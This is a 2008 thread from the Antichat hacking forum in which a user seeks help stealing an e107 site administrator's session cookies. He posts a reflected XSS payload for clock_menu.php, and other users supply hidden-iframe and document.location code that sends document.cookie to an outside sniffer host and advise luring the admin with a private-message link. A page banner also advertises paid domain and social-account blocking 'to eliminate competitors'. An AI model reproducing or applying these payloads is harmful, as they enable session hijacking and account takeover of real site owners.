Форум АНТИЧАТ - Куки админа

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
Куки админа

Опции темы

Поиск в этой теме

Опции просмотра

Куки админа

25.11.2008, 19:05

WiSp

Новичок

Регистрация: 25.06.2008

Сообщений: 5

Провел на форуме:
41608

Репутация: 0

Куки админа

Тако сабж...

Есть уязвимость в движке е107

Код:

clock_menu/clock_menu.php?clock_flat=1&LAN_407=foo%22);//--%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Собсна проблема в том, что не знаю как сделать так чтобы, это все подсунуть админу, и чтобы его куки выскочили не в окне, а сохранились где-то на моем хосте в лог файлах...в этом роде...

З.Ы если есть другие варианты подскажите пожалуйста... а то уже 2-ую неделю мучаюсь

Заранее спасибо

25.11.2008, 22:35

WiSp

Новичок

Регистрация: 25.06.2008

Сообщений: 5

Провел на форуме:
41608

Репутация: 0

Эм....тут чуток разобрался...запустил снифер....Но снифер только на форум..на сайт никак...везде права на все урезаны...как мне через активную xSS можно сделать...Люди, помогите пожалуйста.

26.11.2008, 12:09

chekist

Reservists Of Antichat - Level 6

Регистрация: 14.11.2007

Сообщений: 177

Провел на форуме:
1246854

Репутация: 622

сделай страничку на каком нибудь фрихосте, на странице сделай нивидимый фрейм на хсс, админу в личку отправь месачь с сылкой на эту страницу

26.11.2008, 19:12

WiSp

Новичок

Регистрация: 25.06.2008

Сообщений: 5

Провел на форуме:
41608

Репутация: 0

Собствеено делаю....

Вот

Цитата:

Но не работает( как ни старался... проверял на своем хосте...

26.11.2008, 20:21

WiSp

Новичок

Регистрация: 25.06.2008

Сообщений: 5

Провел на форуме:
41608

Репутация: 0

А используя

Код:

document.write('<iframe width=1 height=1 style="position: absolute; visibility: hidden;" src="'+'http://xss.host.ru/xss.php'+'?['+location.host+']:'+document.cookie+'"></iframe>');

используя ява скрипт он должен открывать в принципе фрейм и сохранять куки вот здесь http://xss.host.ru/cookies

Но после всех проделанных действий ни куки ничего...

З.Ы. хост поддерживает и выполнение ява скриптов и пхп

26.11.2008, 21:19

furang

Познающий

Регистрация: 07.04.2007

Сообщений: 88

Провел на форуме:
6406543

Репутация: 48

у кукисов наверно ограниченная зона действия.
по дефолту у всех / стоит, но можно выбрать и другую диру

27.11.2008, 13:02

chekist

Reservists Of Antichat - Level 6

Регистрация: 14.11.2007

Сообщений: 177

Провел на форуме:
1246854

Репутация: 622

попробуй так

Код HTML:

<html>
тут какой нибуть флуд для админа

<iframe width=21 height=11 style="position: absolute; visibility: hidden;" src="http://жертва/clock_menu/clock_menu.php?clock_flat=1&LAN_407=foo%22);//--><script>document.location='http://тутснифер/?'+document.cookie+;</script>"></iframe>
</html>

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Уязвимости в WR-Meeting 1.0	otmorozok428	Сценарии/CMF/СMS	8	21.05.2008 17:17
Аудит аутентификации на Web-сайтах. Часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:20
Проверка надежности Web-приложений. Часть Третья	k00p3r	Чужие Статьи	0	13.06.2005 11:17
Если уже имеется доступ в админ панель форума PhpBB, как узнать реал пасс админа?	silveran	Форумы	3	06.05.2005 18:54
Есть хеш админа форума phpBB.Можно ли заменитьть куки, чтобы получить права админа?	proff	Форумы	14	06.05.2005 06:00

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход